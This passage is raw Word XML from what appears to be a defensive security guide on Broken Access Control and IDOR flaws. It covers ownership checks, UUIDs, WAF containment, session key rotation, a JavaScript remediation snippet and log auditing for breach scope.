    <w:p w14:paraId="687A27CD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Architect data models so that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155D032" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Record-Level Ownership Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> resource records are tightly coupled with an owner ID. When data is queried, the data layer should inherently enforce ownership by appending the logged-in user's verified ID directly to the query, rather than relying on a client-supplied identifier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4420D725" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>$$\text{Query} = \text{SELECT * FROM invoices WHERE id = } X \ \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>textbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>{AND} \ \text{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> = } \text{Session.User.ID}$$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA7D22" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Zero-Trust Network Architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Treat every microservice, API endpoint, and network segment as fundamentally hostile. Do not assume an API endpoint is safe just because it sits behind an internal firewall or within a private corporate network. Every microservice must validate the user's identities and structural authorization permissions for every single incoming call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF6142" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Strict Parameter Abstraction:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid exposing raw, sequential database auto-incrementing keys (e.g., id=1, id=2) in URLs or API endpoints, which make IDOR vulnerabilities incredibly easy to guess and automate. Instead, abstract these identifiers by using cryptographically secure </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>UUIDs (Universally Unique Identifiers)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or secure, non-enumerable resource tokens (e.g., /view/invoice/f81d4fae-7dec-11d0-a765-00a0c91e6bf6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED30DFF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Incident Response &amp; Mitigation (If Already Exploited/Present)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CCD47E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Immediate Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A00ABFB"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lastRenderedPageBreak/>
        <w:t>When an active exploit of Broken Access Control is detected in production, the primary goal is to "stop the bleeding" and minimize data exfiltration without completely destroying business operations if possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D29D97" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>If the attacker is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F488CA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy Hotfixes via Web Application Firewall (WAF):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> targeting specific API patterns (e.g., sequentially brute-forcing /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>/v1/invoices/*), deploy custom virtual patches or regex rules at the WAF layer to block requests to that specific endpoint or drop traffic matching the attacker's known IP blocks and user-agent strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68308C8A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Feature Flags &amp; Isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the vulnerability resides in a non-critical feature (such as an export report or a profile customization tool), use feature toggles to immediately disable that specific module or route completely while leaving the main application online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C7E33" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mass Session Invalidation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the attacker is tampering with session tokens, manipulating JWTs, or hijacking authenticated sessions, rotate the backend cryptographic signing keys. This will immediately invalidate every active token in circulation, forcing all users (including the attacker) to reauthenticate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD22BDE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Rate Limiting &amp; IP Throttling:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instantly tighten threshold limits on your API gateway to block automated scripting tools (like Burp Suite or custom python scripts) that are scanning sequentially through object IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9A61C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Remediation / Patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68965E6E"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Once the immediate attack is contained, the development team must deploy a permanent code-level fix to eradicate the root cause of the flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB18F21" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Rewrite the Flawed Business Logic:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Introduce strict server-side ownership checks into the data controller or repository layer. Change the logic so it verifies relationship integrity before executing operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CCD7C8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7ED19F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">// REMEDIATION: Explicitly check record ownership on the server const invoice = await </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Invoice.findById</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>req.params.invoiceId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>); if (!invoice) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CA2EC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>res.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(404).send("Invoice not found."); } if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>invoice.userId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> !== req.user.id &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>req.user.role</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> !== 'admin') { return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>res.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(403).send("Unauthorized access attempt."); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42E96A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce Centralized Access Filters:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Migrate the route out of a loosely protected controller setup and place it behind an authorized route-guard or standard middleware handler that automatically forces standard identity checks across all adjacent paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11014B65" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Eliminate Sequential IDs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Update database queries and API models to map incoming data requests through non-guessable </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>UUID v4</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> tokens rather than incremental integers, blocking an attacker's ability to easily map out valid target parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B62AE5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Blast Radius Clean-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C987EC9"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If the attacker successfully exploited the vulnerability prior to containment, you must conduct a thorough forensic analysis to determine the scope of damage and clean the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144DEED" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Audit Access Logs (Determining What Was Stolen):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analyze web server logs, API gateway trackers, and database query logs. Look for single IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29183E"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addresses or user accounts making a disproportionately high volume of successful requests (200 OK) across various resource IDs in a short time frame. This allows you to compile an exact list of files, accounts, or records that were compromised for regulatory disclosure (like GDPR).</w:t>
      </w:r>
    </w:p>
